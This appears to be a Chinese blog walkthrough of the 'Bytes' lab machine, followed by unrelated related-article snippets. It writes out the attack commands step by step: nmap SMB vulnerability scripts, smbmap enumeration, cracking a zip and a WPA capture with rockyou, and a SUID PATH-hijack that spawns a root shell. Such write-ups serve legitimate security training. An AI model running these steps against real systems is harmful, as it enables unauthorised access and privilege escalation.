信息收集

netdiscovery -i eth0

nmap -sV -sC 192.168.43.74 -oA os-Bytes

gobuster -u 192.168.43.74 -w /usr/share/wordlists/dirbuster/ -t 100

攻击开始

有smb端口开放,使用nmap脚本泡一下

nmap -p 139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.43.74

大骂一句辣鸡什么东西。

smbmap -H 192.168.43.74列出他的共享目录,发现没有权限。

发现admin用户密码不对的时候自动使用guest访问。

一个专业的评估软件。可以跑出来有哪些用户。

然后使用smbmap -H 1192.168.43.74 -u smb来测试出这个账户没有密码

发现登陆不上去,但是smb用户是没有密码的,但是为什么也是一样的呢?

说明smb的共享目录被隐藏了,现在来尝试下一种方法。(读取隐藏目录)

猜测目录的位置

/home/smb或者/home/smb/smb目录的操作。

这样就登陆成功并且拿到了文件。

然后爆破压缩包

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap 爆破加密流量包。

然后得到账号和密码,ssh登陆。

然后查找有无suid文件。find / type f -perm -u=s 2>/dev/null

xxd /usr/bin/netscan| less分析文件。

来做环境变量的劫持。

  1. 因为这个root程序运行的时候,会调用netstat命令
  2. echo "/bin/sh" >netstat
  3. chmod 755 netstat
  4. echo $PATH
  5. export PATH=/tmp:$PATH
  6. echo $PATH
  7. 然后就可以了。suid劫持提权。

os-Bytes环境变量劫持的更多相关文章

  1. Mac OS增删环境变量

    一.首先查看shell版本 使用命令echo $SHELL 如果输出的是:csh或者是tcsh,就是C Shell.如果输出的是:bash,sh,zsh,就是Bourne Shell的一个变种. Ma ...

  2. MAC OS JAVA环境变量配置

    在  /etc/profile 中 加上这些 #临时提权 sudo su #输入密码 vi /etc/profile #配置JAVA_HOME,此处路径根据自己的版本填写 JAVA_HOME=&quo ...

  3. Center os 用户环境变量

    vi ~/.bash_profile进入用户环境变量设置 export JAVA_HOME=/usr/java/jdk1.7.0_76export JAVA_BIN=$JAVA_HOME/binexp ...

  4. django os.environ慎用setdefault操作环境变量!

    在绝大多数情况下,如果需要在程序运行过程中设置环境变量,使用os.environ.setdefault函数是没有任何问题的,但是有两种场景下setdefault会造成意外的问题,需要慎用: 如果程序执 ...

  5. 理解及操作环境变量(基于Mac操作)

    通过本文,简单的了解下环境变量及其操作,与便于遇到相关问题时能够准确快捷的解决. 什么是环境变量 An environment variable is a dynamic-named value th ...

  6. ASP .NET CORE 根据环境变量支持多个 appsettings.json

    0.背景 在开发项目的过程当中,生产环境与调试环境的配置肯定是不一样的.拿个最简单的例子来说,比如连接字符串这种东西,调试环境肯定是不能连接生产数据库的.在之前的话,这种情况只能说是你 COPY 两个 ...

  7. 如何在Jenkins中使用环境变量

    以BUILD_NUMBER为例, 1.在windows batch命令中使用此环境变量,使用%BUILD_NUMBER%即可 2.在Linux shell命令中使用此环境变量,使用${BUILD_NU ...

  8. python设置环境变量(临时和永久)

    设置临时环境变量 import os # 设置环境变量 os.environ['WORKON_HOME']="value" # 获取环境变量方法1 os.environ.get(' ...

  9. 记录--mac下终端内的环境变量问题

    一直使用的是前几年买的MacBook Air,当时感觉很轻薄,外观也非常的好看,也是一直用到现在,大概有三四年了,系统还是很流畅(实话,不是打广告......).平时也是经常要使用mac的终端,说实话 ...

随机推荐

  1. 利用Python将PDF文档转为MP3音频

    1. 转语音工具 微信读书有一个功能,可以将书里的文字转换为音频,而且声音优化的不错,比传统的机械朗读听起来舒服很多. 记得之前看到过Python有一个工具包,可以将文字转换为语音,支持英文和中文,而 ...

  2. 怎样用Python自制好看的指数估值图

    对于以定投指数的方式理财的朋友,最需要关注的指标便是各个指数的估值,在指数低估时买入,高估时卖出,那如何制作一张估值图来跟踪指数的估值情况呢?本文就从0到1介绍如何用 Matplotlib 画一张漂亮 ...

  3. 服务器安装PVE6.1.2

    1     去官网下载PVE的镜像文件 https://www.proxmox.com/en/downloads 2     制作成U盘启动 准备一个U盘用来制作启动盘(记得将U盘里原来的资料备份然后 ...

  4. 【mybatis-plus】CRUD必备良药,mybatis的好搭档

    做开发,免不了对数据进行增删改查,那么mybatis-plus我觉得很适合我这个java新手,简单好用. 官网在这 一.什么是mybatis-plus MyBatis-Plus(简称 MP),是一个M ...

  5. Java“微服务”还能这么玩!

      "微服务"加个引号是因为这不是传统定义的微服务架构,顶多算是"小服务"架构,因为服务实例由集群节点统一加载,非独立部署.下面以图说明一下服务调用流程. 一. ...

  6. React组件的state和props

    React组件的state和props React的数据是自顶向下单向流动的,即从父组件到子组件中,组件的数据存储在props和state中.实际上在任何应用中,数据都是必不可少的,我们需要直接的改变 ...

  7. 5.innodb B+tree索引

    索引基础 索引是数据结构 1.图例 2.B+tree 特征 1.非叶子节点不保存数据,只用来索引,数据都保存在叶子节点 2.查询任何一条数据,查询的索引深度都是一样的 3. B+ 树中各个页之间是通过 ...

  8. A child container failed during start

    先贴一下bug详情 严重: A child container failed during start java.util.concurrent.ExecutionException: org.apa ...

  9. 还在使用Future轮询获取结果吗?CompletionService快来了解下吧。

    背景 二胖上次写完参数校验(<二胖写参数校验的坎坷之路>)之后,领导一直不给他安排其他开发任务,就一直让他看看代码熟悉业务.二胖每天上班除了偶尔跟坐在隔壁的前端小姐姐聊聊天,就是看看这些 ...

  10. SpringMVC+JPA+SpringData配置

    <properties>   <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>  ...